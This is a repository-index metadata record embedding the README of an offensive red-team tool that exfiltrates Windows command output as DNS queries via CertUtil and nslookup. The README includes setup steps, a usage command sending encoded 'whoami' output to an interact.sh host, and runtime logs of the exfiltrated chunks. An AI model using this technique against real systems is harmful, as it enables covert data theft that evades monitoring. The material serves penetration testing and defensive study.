{"id":15374458,"url":"https://github.com/ivan-sincek/dns-exfiltrator","last_synced_at":"2026-01-06T22:50:35.810Z","repository":{"id":39575511,"uuid":"331631428","full_name":"ivan-sincek/dns-exfiltrator","owner":"ivan-sincek","description":"Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.","archived":false,"fork":false,"pushed_at":"2023-12-30T20:23:18.000Z","size":3,"stargazers_count":22,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-02T00:27:36.660Z","etag":null,"topics":["batch","bug-bounty","burp-collaborator-server","certutil","dns","dns-query","ethical-hacking","exfiltrator","lolbas","malware","networking","nslookup","offensive-security","penetration-testing","red-team-engagement","security","wireshark"],"latest_commit_sha":null,"homepage":"","language":"Batchfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-01-21T13:09:43.000Z","updated_at":"2024-11-17T23:43:31.000Z","dependencies_parsed_at":"2023-11-13T00:27:24.866Z","dependency_job_id":"e766fd3a-515f-471e-a66b-c5244935a5d6","html_url":"https://github.com/ivan-sincek/dns-exfiltrator","commit_stats":{"total_commits":1,"total_committers":1,"mean_commits":1.0,"dds":0.0,"last_synced_commit":"1b641736f1425a67568c22dcdab95ee997cc65c8"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fdns-exfiltrator","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fdns-exfiltrator/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fdns-exfiltrator/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fdns-exfiltrator/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/dns-exfiltrator/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245931894,"owners_count":20695964,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["batch","bug-bounty","burp-collaborator-server","certutil","dns","dns-query","ethical-hacking","exfiltrator","lolbas","malware","networking","nslookup","offensive-security","penetration-testing","red-team-engagement","security","wireshark"],"created_at":"2024-10-01T13:58:50.039Z","updated_at":"2026-01-06T22:50:35.772Z","avatar_url":"https://github.com/ivan-sincek.png","language":"Batchfile","funding_links":[],"categories":[],"sub_categories":[],"readme":"# DNS Exfiltrator\n\nExfiltrate data with DNS queries. Based on CertUtil and NSLookup.\n\nBase64 or Hex encode the command output using CertUtil, and then exfiltrate it in chunks up to 63 characters per query using NSLookup.\n\nIn case of Base64 encoding, some special characters will be replaced due to the domain name limitations:\n\n| Base64 Character | Replacement |\n| --- | --- |\n| \\+ | plus |\n| \\/ | slash |\n| \\= | eqls |\n\nTested on Windows 10 Enterprise OS (64-bit).\n\nMade for educational purposes. I hope it will help!\n\nFuture plans:\n\n* create a Python script to parse `interact.sh` results,\n* create a one-liner out of the whole Batch script,\n* create a Burp Suite extension that will use a Burp Collaborator server.\n\n## How to Run\n\nDownload, unpack, give necessary permissions, and run the latest [interact.sh](https://github.com/projectdiscovery/interactsh/releases) client:\n\n```fundamental\nchmod +x interactsh-client\n\n./interactsh-client -dns-only -json -o interactsh.json\n```\n\nAfter running the tool, you should be able to see the `interact.sh` (collaborator server) subdomain, e.g. `xyz.oast.fun`.\n\nNext, make sure to specify either `base64` or `hex` as the encoding, and [Base64 encode](https://www.base64encode.org) your Batch one-liner command, e.g. `whoami` equals to `d2hvYW1p`.\n\nFinally, open the Command Prompt from [\\\\src\\\\](https://github.com/ivan-sincek/dns-exfiltrator/tree/main/src) and run the following command:\n\n```fundamental\ndns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1p\n```\n\n## Runtime\n\n```fundamental\nC:\\Users\\W10\\Desktop\u003edns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1pIC9wcml2\n################################################################\n#                                                              #\n#                     DNS Exfiltrator v1.3                     #\n#                                by Ivan Sincek                #\n#                                                              #\n# Exfiltrate data with DNS queries.                            #\n# GitHub repository at github.com/ivan-sincek/dns-exfiltrator. #\n#                                                              #\n################################################################\nServer:  UnKnown\nAddress:  172.20.10.1\n\nNon-authoritative answer:\nName:    UFJJVklMRUdFUyBJTkZPUk1BVElPTiANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0.xyz.oast.fun\nAddress:  206.189.156.69\n\nServer:  UnKnown\nAddress:  172.20.10.1\n\nNon-authoritative answer:\nName:    gDQpQcml2aWxlZ2UgTmFtZSAgICAgICAgICAgICAgICBEZXNjcmlwdGlvbiAgIC.xyz.oast.fun\nAddress:  206.189.156.69\n\nServer:  UnKnown\nAddress:  172.20.10.1\n\nNon-authoritative answer:\nName:    AgICAgICAgICAgICAgICAgICAgICAgU3RhdGUgICAgDQo9PT09PT09PT09PT09P.xyz.oast.fun\nAddress:  206.189.156.69\n\n...\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fdns-exfiltrator","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fdns-exfiltrator","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fdns-exfiltrator/lists"}